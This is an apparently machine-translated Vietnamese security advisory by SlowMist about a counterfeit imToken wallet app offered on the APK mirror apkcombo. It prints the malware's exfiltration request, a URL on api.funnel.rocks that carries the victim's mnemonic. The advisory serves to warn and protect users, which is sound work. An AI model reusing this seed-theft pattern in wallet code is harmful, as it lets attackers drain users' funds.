lý lịch

lý lịch

Web3 dựa trên công nghệ chuỗi khối đang thúc đẩy thế hệ tiếp theo của cuộc cách mạng công nghệ và ngày càng có nhiều người bắt đầu tham gia vào làn sóng mã hóa này, nhưng Web3 và Web2 là hai thế giới hoàn toàn khác nhau. Thế giới Web3 là một khu rừng tối chứa đầy những cơ hội và nguy hiểm khác nhau, trong thế giới Web3, chiếc ví là lối vào và thẻ thông hành để bước vào thế giới Web3.

Khi bạn khám phá và trải nghiệm nhiều ứng dụng và trang web liên quan đến blockchain trong thế giới Web3 thông qua ví của mình, bạn sẽ thấy rằng mọi ứng dụng trên chuỗi công khai đều sử dụng ví để "đăng nhập"; điều này khác với Đăng nhập "đăng nhập" truyền thống của chúng tôi" khác, trong thế giới Web2, các tài khoản giữa mỗi ứng dụng không thể tương tác với nhau. Nhưng trong thế giới của Web3, tất cả các ứng dụng đều sử dụng ví để "đăng nhập" một cách thống nhất, chúng ta có thể thấy rằng "Đăng nhập bằng Ví" không được hiển thị khi "đăng nhập" vào ví mà thay vào đó là "Kết nối Ví". Và ví là hộ chiếu duy nhất của bạn trong thế giới Web3.

Như người ta thường nói, dưới những tòa nhà cao tầng phải có bóng tối, trong thế giới Web3 nóng bỏng như vậy, ví tiền, với tư cách là ứng dụng cấp đầu vào, đương nhiên là mục tiêu của chuỗi ngành đen xám.

tiêu đề cấp đầu tiên

phân tích trang web

Xét về nhiều cách tải xuống, hôm nay chúng ta hãy lấy apkcombo làm ví dụ. Apkcombo là chợ ứng dụng của bên thứ 3. Theo tuyên bố chính thức, hầu hết các ứng dụng mà nó cung cấp đều đến từ các cửa hàng ứng dụng chính thức khác, nhưng sự thật có phải vậy không?

Đầu tiên hãy xem lượng truy cập của apkcombo lớn như thế nào:

Theo thống kê từ trang thống kê similarweb, trang apkcombo:

Xếp hạng toàn cầu: 1.809

Xếp hạng quốc gia: 7.370

Xếp hạng danh mục: 168

Có thể thấy tầm ảnh hưởng và lượng truy cập của nó là rất lớn.

Nó cung cấp plugin tải xuống APK chrome theo mặc định và chúng tôi nhận thấy rằng số lượng người dùng plugin này đạt 10 W+:

Vì vậy, quay lại hướng ví trong lĩnh vực Web3 mà chúng tôi quan tâm, ứng dụng ví mà người dùng tải xuống từ đây an toàn đến mức nào?

Hãy lấy ví imToken nổi tiếng làm ví dụ. Đường dẫn tải xuống chính thức của Google Play là:

https://play.google.com/store/apps/details? id=im.token.app

Do nhiều điện thoại di động không hỗ trợ Google Play hoặc do sự cố mạng nên nhiều người sẽ tải xuống ứng dụng Google Play từ đây.

Đường dẫn download apkcombo mirror station là:

https://apkcombo.com/downloader/#package=im.token.app

Từ hình trên ta có thể thấy phiên bản do apkcombo cung cấp là 24.9.11, sau khi imToken xác nhận thì đây là phiên bản không tồn tại! Người ta xác nhận rằng đây là phiên bản có nhiều ví imToken giả nhất hiện nay trên thị trường.

Tại thời điểm viết bài này, phiên bản mới nhất của ví imToken là 2.11.3. Số phiên bản của ví này rất cao và rõ ràng là nó được đặt để giả vờ là phiên bản mới nhất.

Như trong hình bên dưới, chúng tôi thấy trên apkcombo rằng phiên bản ví giả mạo này hiển thị khối lượng tải xuống lớn. Khối lượng tải xuống ở đây phải là thông tin khối lượng tải xuống được thu thập từ Google Play. Vì lý do bảo mật, chúng tôi cảm thấy cần phải tiết lộ nguồn của ứng dụng độc hại này. Ngăn không cho nhiều người tải xuống ví giả này.

Đồng thời, chúng tôi thấy rằng có các trang tải xuống tương tự như: uptodown

Liên kết tải xuống: https://imtoken.br.uptodown.com/android

tiêu đề cấp đầu tiên

phân tích ví

Chúng tôi đã phân tích nhiều trường hợp ví giả trước đây, chẳng hạn như: 24-11-2021 Chúng tôi đã tiết lộ: "SlowMist: Ứng dụng ví giả đã khiến hàng chục nghìn người bị đánh cắp, thiệt hại lên tới 1,3 tỷ đô la Mỹ", vì vậy tôi sẽ không đi vào chi tiết ở đây.

Chúng tôi chỉ phân tích ví giả với phiên bản 24.9.11 do apkcombo cung cấp, khi tạo ví hoặc nhập bản ghi nhớ ví trên giao diện bắt đầu, ví giả sẽ gửi bản ghi nhớ và các thông tin khác đến máy chủ của trang web lừa đảo, như trong hình hình bên dưới:

Theo mã APK đảo ngược và phân tích thực tế của các gói lưu lượng, phương thức gửi ghi nhớ như sau:

https://api.funnel.rocks/api/trust?aid= 10&wt= 1&os= 1&key=<mnemonic>

Nhìn vào hình bên dưới, chứng chỉ "api.funnel.rocks" sớm nhất xuất hiện vào ngày 2022-06-03, đây là thời điểm gần đúng khi cuộc tấn công bắt đầu:

tóm tắt

tóm tắt

Hiện tại, loại hoạt động lừa đảo này không chỉ hoạt động mạnh mà thậm chí còn có xu hướng mở rộng phạm vi và các nạn nhân mới bị lừa mỗi ngày. Là liên kết yếu nhất trong hệ thống bảo mật, người dùng phải luôn hoài nghi và nâng cao nhận thức về bảo mật cũng như nhận thức về rủi ro. Khi bạn sử dụng ví và sàn giao dịch, vui lòng tìm kênh tải xuống chính thức và xác minh kênh đó từ nhiều bên; nếu ví của bạn là từ bên trên mirror Vui lòng chuyển nội dung và gỡ cài đặt phần mềm càng sớm càng tốt, đồng thời xác minh thông qua kênh xác minh chính thức nếu cần.

Đồng thời, nếu bạn cần sử dụng ví, vui lòng đảm bảo tìm kiếm các trang web chính thức sau đây của các ứng dụng ví chính thống:

1/ví imToken:https://token.im/

2/Ví TokenPocket:https://www.tokenpocket.pro/

3/Ví TronLink:https://www.tronlink.org/

4/Ví Bitpie:https://bitpie.com/

5/Ví MetaMask:https://metamask.io/

6 /Trust Wallet：https://trustwallet.com/

Vui lòng tiếp tục chú ý đến nhóm bảo mật SlowMist, nhiều cảnh báo và phân tích rủi ro bảo mật Web3 đang được triển khai.

Lời cảm ơn: Cảm ơn imToken đã hỗ trợ xác minh do quan chức cung cấp trong quá trình truy xuất nguồn gốc.

Do tính bảo mật và quyền riêng tư, bài viết này chỉ là phần nổi của tảng băng chìm. Qua đây SlowMist đề nghị người dùng cần củng cố hiểu biết về kiến ​​thức bảo mật, củng cố hơn nữa khả năng nhận diện các cuộc tấn công lừa đảo, v.v. để tránh gặp phải các cuộc tấn công như vậy. Để có thêm kiến ​​thức về an toàn, bạn nên đọc Slow Mist's"Sổ tay tự trợ giúp về Blockchain Dark Forest"。